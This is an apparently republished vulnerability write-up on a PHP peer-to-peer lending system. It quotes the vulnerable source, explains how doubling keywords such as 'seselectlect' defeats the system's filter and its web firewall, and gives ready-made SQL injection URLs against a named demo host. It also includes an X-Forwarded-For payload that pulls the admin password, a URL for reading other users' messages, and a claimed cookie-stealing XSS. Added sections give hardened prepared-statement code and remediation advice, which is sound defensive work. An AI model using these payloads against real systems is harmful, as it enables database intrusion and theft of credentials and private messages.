SQL injection, unauthorized access and XSS in a P2P online lending system (demo successful)

Source: Internet
Author: User


Only the site's home page is needed for this.
A SafeDog WAF is installed in front of the site, but it does not help.

Injection 1 (test failed)

See the code in core\deayou.core.php, lines 65-86:
 

elseif ($_G['query_site'] == 'home') {
    $user_id = $_REQUEST['user_id'];   // taken straight from the request
    if ($user_id == '') {
        $user_id = $_G['user_id'];
    }
    $_G['article_id'] = $user_id;
    $magic->assign('_G', $_G);
    usersClass::AddVisit(array('user_id' => $user_id, 'visit_userid' => $_G['user_id']));
    if ($home_dir != '') {
        $magic->template_dir = $home_dir;
        $magic->assign('tpldir', '/' . $home_dir);
        $magic->display($home_template);
    } else {
        $magic->display('home.html');
    }
    die;
}


Then follow the call into usersClass::AddVisit:
 

/**
 * Recent visit
 * @param $param array('user_id' => 'Member id')
 * @return bool true/false
 */
public static function AddVisit($data = array()) {
    global $mysql;
    if (isset($data['visit_userid']) && $data['visit_userid'] != "" && $data['user_id'] != $data['visit_userid']) {
        $time = time();
        $ip = ip_address();
        // user_id and visit_userid are spliced into the query without quotes or validation
        $sql = "select id from `{users_visit}` where user_id = {$data['user_id']} and visit_userid = {$data['visit_userid']}";
        $result = $mysql->db_fetch_array($sql);
        // update the existing record, otherwise insert a new one
        if ($result != false) {
            $sql = "update `{users_visit}` set addtime = '{$time}', addip = '{$ip}' where id = '{$result['id']}'";
            $mysql->db_query($sql);
        } else {
            $sql = "insert into `{users_visit}` set user_id = '{$data['user_id']}', visit_userid = '{$data['visit_userid']}', addtime = '{$time}', addip = '{$ip}'";
            $mysql->db_query($sql);
        }
        // if there are more than 10 records (the code actually checks for 20), delete the earliest
        $sql = "select count(1) as num from `{users_visit}` where user_id = {$data['user_id']}";
        $result = $mysql->db_fetch_array($sql);
        if ($result['num'] > 20) {
            $sql = "select id from `{users_visit}` where user_id = {$data['user_id']} order by addtime asc";
            $result = $mysql->db_fetch_array($sql);
            $sql = "delete from `{users_visit}` where id = '{$result['id']}'";
            $mysql->db_query($sql);
        }
    }
}


user_id is not enclosed in single quotes in the query, which is what makes the injection possible.


There is also a global filter function:
 

function inject_check($sql_str) {
    $sql    = array('select', 'insert', '\\\'', '\\/\\*', '\\.\\.\\/', '\\.\\/', 'union', 'into', 'load_file', 'outfile');
    $sql_re = array('', '', '', '', '', '', '', '', '', '', '', '');
    // a single literal str_replace pass: each keyword is removed once
    return str_replace($sql, $sql_re, $sql_str);
}



Writing the keyword twice bypasses it: str_replace makes a single pass, so the inner "select" in "seselectlect" is removed and the remaining characters reassemble into "select". Once past this filter, the SafeDog WAF no longer helps either.


 

http://demo2.tuanshang.net/?home&user_id=updatexml(1,concat(1,(seselectlect+database())),1)

Injection 2


modules/message.inc.php
 

elseif ($_U['query_type'] == "senteds") {
    if (isset($_POST['type']) && $_POST['type'] == 2) {
        $data['id'] = $_POST['id'];
        $data['ent_user'] = $_G['user_id'];
        $data['sented'] = 0;
        $result = messageClass::update($data);
        if ($result != true) {
            $msg = array($MsgInfo[$result], "", $_U['query_url']);
        } else {
            $msg = array("operation successful");
        }
    } else {
        /*
        $data['sent_user'] = $_G['user_id'];
        $data['page'] = $_U['page'];
        $data['epage'] = $_U['epage'];
        $data['sented'] = 1;
        $result = messageClass::GetList($data);
        if (is_array($result)) {
            $pages->set_data($result);
            $_U['message_list'] = $result['LIST'];
            $_U['show_page'] = $pages->show(3);
        } else {
            $msg = array($result, "", $_U['query_url']);
        }
        */
        if (isset($_REQUEST['id'])) {
            // id (a scalar or an array) goes straight from the request into DeleteMessageReceive
            $data['id'] = $_REQUEST['id'];
            $data['user_id'] = $_G['user_id'];
            $result = messageClass::DeleteMessageReceive($data);
            if ($result > 0) {
                $msg = array("deleted successfully", "", "/?user&q=code/message");
            } else {
                $msg = array($MsgInfo[$result]);
            }
        } else {
            $msg = array("Please select and operate");
        }
    }
}



Then follow up into the DeleteMessageReceive function:
 

function DeleteMessageReceive($data = array()) {
    global $mysql;
    if (!IsExiest($data['id'])) return "message_receive_id_empty";
    if (is_array($data['id'])) {
        $data['id'] = join(",", $data['id']);   // array elements are joined as-is
    }
    $_sql = " where id in ({$data['id']})";     // id is spliced into the SQL unquoted
    if (isset($data['user_id']) && $data['user_id'] != "") {
        $_result = self::GetMessageReceiveOne($data);
        $_sql .= " and user_id='{$data['user_id']}' and type='user'";
        $sql = "delete from `{message_receive}` {$_sql}";
        $mysql->db_query($sql);
        if ($_result['type'] != 'user') {
            $sql = "delete from `{message_receive}` where user_id='{$data['user_id']}' and receive_value='{$data['id']}'";
            $mysql->db_query($sql);
        }
        return $data['user_id'];
    } else {
        $sql = "delete from `{message_receive}` {$_sql}";
        $mysql->db_query($sql);
    }
    return $data['id'];
}


You can see that $data['id'] is placed into the IN (...) clause without quoting or validation, so it can be injected:

http://demo2.tuanshang.net/?user&q=code/message/sentdeledid%5B0%5D=8) or updatexml(1,concat(1,(seselectlect+user())),1&type=1


modules/message.inc.php
 

elseif ($_U['query_type'] == "sentdeled") {
    if (isset($_REQUEST['id'])) {
        $data['id'] = $_REQUEST['id'];
        $data['user_id'] = $_G['user_id'];
        $result = messageClass::DeleteMessage($data);
        if ($result > 0) {
            $msg = array($MsgInfo["message_action_success"], "", "/?user&q=code/message/sented");
        } else {
            $msg = array($MsgInfo[$result]);
        }
    } else {
        $msg = array("Please select and operate");
    }
}


Following up into DeleteMessage:

function DeleteMessage($data = array()) {
    global $mysql;
    if (!IsExiest($data['id'])) return "message_id_empty";
    if (is_array($data['id'])) {
        $data['id'] = join(",", $data['id']);
    }
    $_sql = " where id in ({$data['id']})";   // unquoted, unvalidated id list
    if (isset($data['user_id']) && $data['user_id'] != "") {
        $_sql .= " and user_id='{$data['user_id']}' ";
    }
    $sql = "delete from `{message}` {$_sql}";
    $mysql->db_query($sql);
    return 1;
}


Here too, id is spliced into the query and can be injected:
 

http://demo2.tuanshang.net/?user&q=code/message/sentedsid%5B0%5D=8) or updatexml(1,concat(1,(seselectlect+user())),1&type=1

Injection 3
 

function ip_address() {
    if (!empty($_SERVER["HTTP_CLIENT_IP"])) {
        $ip_address = $_SERVER["HTTP_CLIENT_IP"];
    } else if (!empty($_SERVER["HTTP_X_FORWARDED_FOR"])) {
        // takes the last comma-separated entry of X-Forwarded-For, a header the client controls
        $ip_address = array_pop(explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']));
    } else if (!empty($_SERVER["REMOTE_ADDR"])) {
        $ip_address = $_SERVER["REMOTE_ADDR"];
    } else {
        $ip_address = '';
    }
    return $ip_address;   // returned without any validation
}



The value returned by ip_address() is then written into users_visit by AddVisit:

public static function AddVisit($data = array()) {
    global $mysql;
    if (isset($data['visit_userid']) && $data['visit_userid'] != "" && $data['user_id'] != $data['visit_userid']) {
        $time = time();
        $ip = ip_address();   // client-controlled header value, only single-quoted below, never validated
        $sql = "select id from `{users_visit}` where user_id = {$data['user_id']} and visit_userid = {$data['visit_userid']}";
        $result = $mysql->db_fetch_array($sql);
        // update the existing record, otherwise insert a new one
        if ($result != false) {
            $sql = "update `{users_visit}` set addtime = '{$time}', addip = '{$ip}' where id = '{$result['id']}'";
            $mysql->db_query($sql);
        } else {
            $sql = "insert into `{users_visit}` set user_id = '{$data['user_id']}', visit_userid = '{$data['visit_userid']}', addtime = '{$time}', addip = '{$ip}'";
            $mysql->db_query($sql);
        }
        // if there are more than 10 records (the code actually checks for 20), delete the earliest
        $sql = "select count(1) as num from `{users_visit}` where user_id = {$data['user_id']}";
        $result = $mysql->db_fetch_array($sql);
        if ($result['num'] > 20) {
            $sql = "select id from `{users_visit}` where user_id = {$data['user_id']} order by addtime asc";
            $result = $mysql->db_fetch_array($sql);
            $sql = "delete from `{users_visit}` where id = '{$result['id']}'";
            $mysql->db_query($sql);
        }
    }
}



The injection is in addip: the header value goes into the update/insert statement with nothing but single quotes around it.

Set the X-Forwarded-For header to:

xxx' or EXP(~(select * from (select password from tuanshang_users_admin limit 1)a)) or '
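The following is an added example, not the project's own code: a hardened replacement for the users_visit part of usersClass::AddVisit that addresses both Injection 1 (ids spliced into the SQL behind a keyword blacklist) and Injection 3 (addip taken from a client-controlled header). It assumes a PDO connection and a users_visit table with the columns used in the original queries; the function names client_ip and add_visit are my own.

```php
<?php
// Added example, not the project's code: hardened replacement for the
// users_visit lookup/update/insert in usersClass::AddVisit, covering
// Injection 1 (user_id spliced into SQL unquoted, behind a keyword blacklist)
// and Injection 3 (addip taken from a client-controlled header).
// Assumes a PDO connection in ERRMODE_EXCEPTION and a table users_visit
// with columns id, user_id, visit_userid, addtime, addip.

// X-Forwarded-For and Client-IP are request headers, so they are attacker
// input unless a proxy we operate appended them. Otherwise use REMOTE_ADDR.
function client_ip(array $server, array $trusted_proxies = array()): string
{
    $addr = $server['REMOTE_ADDR'] ?? '';
    if (in_array($addr, $trusted_proxies, true) && !empty($server['HTTP_X_FORWARDED_FOR'])) {
        // The entry appended by our own proxy is the last one in the list.
        $hops = array_map('trim', explode(',', $server['HTTP_X_FORWARDED_FOR']));
        $addr = end($hops);
    }
    // Anything that is not a literal IPv4/IPv6 address (e.g. "xxx' or EXP(...")
    // is rejected here, so it can never reach the addip column.
    return filter_var($addr, FILTER_VALIDATE_IP) === false ? '' : $addr;
}

function add_visit(PDO $pdo, array $server, $user_id, $visit_userid): bool
{
    // A keyword blacklist is not validation: require genuine positive integers.
    $opts = array('options' => array('min_range' => 1));
    $user_id      = filter_var($user_id, FILTER_VALIDATE_INT, $opts);
    $visit_userid = filter_var($visit_userid, FILTER_VALIDATE_INT, $opts);
    if ($user_id === false || $visit_userid === false || $user_id === $visit_userid) {
        return false;
    }
    $ip  = client_ip($server);
    $now = time();

    // Every value travels as a bound parameter; the SQL text itself is constant.
    $stmt = $pdo->prepare('SELECT id FROM users_visit WHERE user_id = ? AND visit_userid = ?');
    $stmt->execute(array($user_id, $visit_userid));
    $id = $stmt->fetchColumn();
    if ($id !== false) {
        $stmt = $pdo->prepare('UPDATE users_visit SET addtime = ?, addip = ? WHERE id = ?');
        $stmt->execute(array($now, $ip, $id));
    } else {
        $stmt = $pdo->prepare(
            'INSERT INTO users_visit (user_id, visit_userid, addtime, addip) VALUES (?, ?, ?, ?)'
        );
        $stmt->execute(array($user_id, $visit_userid, $now, $ip));
    }
    return true;
}
```

Note that without the trusted-proxy list the function falls back to REMOTE_ADDR, which is the only address a client cannot set in a header.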


Injection 5

http://demo2.tuanshang.net/?user&q=code/message/sent

When sending a message.

Unauthorized access

Read any in-site message:

http://demo2.tuanshang.net/?user&q=code/message/viewed&id=1

Here you can simply change the id value; the message is returned without checking that it belongs to the logged-in user.
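As an added example, not the project's code, here are owner-scoped replacements for the two delete handlers of Injection 2 and for the message/viewed lookup behind the unauthorized read. It assumes a PDO connection; the table names follow the original queries, while the column name content and the helper names are my own assumptions.

```php
<?php
// Added example, not the project's code. Owner-scoped replacements for the
// DeleteMessage / DeleteMessageReceive handlers (Injection 2) and for the
// message/viewed lookup (unauthorized read). Assumes a PDO connection in
// ERRMODE_EXCEPTION; table and column names (message, message_receive,
// user_id, content) are assumptions modelled on the original queries.

// Normalise ?id=8 or ?id[]=8&id[]=9 into a list of positive integers. Anything
// else, such as "8) or updatexml(...", is dropped instead of being joined into SQL.
function clean_id_list($raw): array
{
    $ids = array();
    foreach ((array) $raw as $v) {
        $n = filter_var($v, FILTER_VALIDATE_INT, array('options' => array('min_range' => 1)));
        if ($n !== false) {
            $ids[] = $n;
        }
    }
    return array_values(array_unique($ids));
}

// Delete only rows the current user owns. The IN list is made of one
// placeholder per id, so user input never becomes part of the SQL text.
function delete_own_messages(PDO $pdo, string $table, $raw_ids, int $user_id): int
{
    $ids = clean_id_list($raw_ids);
    if ($ids === array() || !in_array($table, array('message', 'message_receive'), true)) {
        return 0;   // table name is checked against a fixed allow-list, never taken from input
    }
    $marks = implode(',', array_fill(0, count($ids), '?'));
    $stmt = $pdo->prepare("DELETE FROM `$table` WHERE id IN ($marks) AND user_id = ?");
    $stmt->execute(array_merge($ids, array($user_id)));
    return $stmt->rowCount();
}

// Return a received message only if it is addressed to the current user. A valid
// id that belongs to someone else yields null, which closes the viewed&id=N read.
function view_own_message(PDO $pdo, $raw_id, int $user_id): ?array
{
    $ids = clean_id_list($raw_id);
    if (count($ids) !== 1) {
        return null;
    }
    $stmt = $pdo->prepare('SELECT id, user_id, content FROM message_receive WHERE id = ? AND user_id = ?');
    $stmt->execute(array($ids[0], $user_id));
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}
```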


XSS


XSS exists in the private message sent to a user. A simple fuzz shows that the filter can be bypassed.


Construct the payload in the message content.

The cookie is retrieved.

Solution:

Filter input and escape output. For the SQL injections, validate ids as integers and pass values as bound parameters of prepared statements instead of relying on the keyword blacklist; for the message read, check that the record belongs to the logged-in user before returning it; for the XSS, HTML-escape message content when it is rendered.

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.
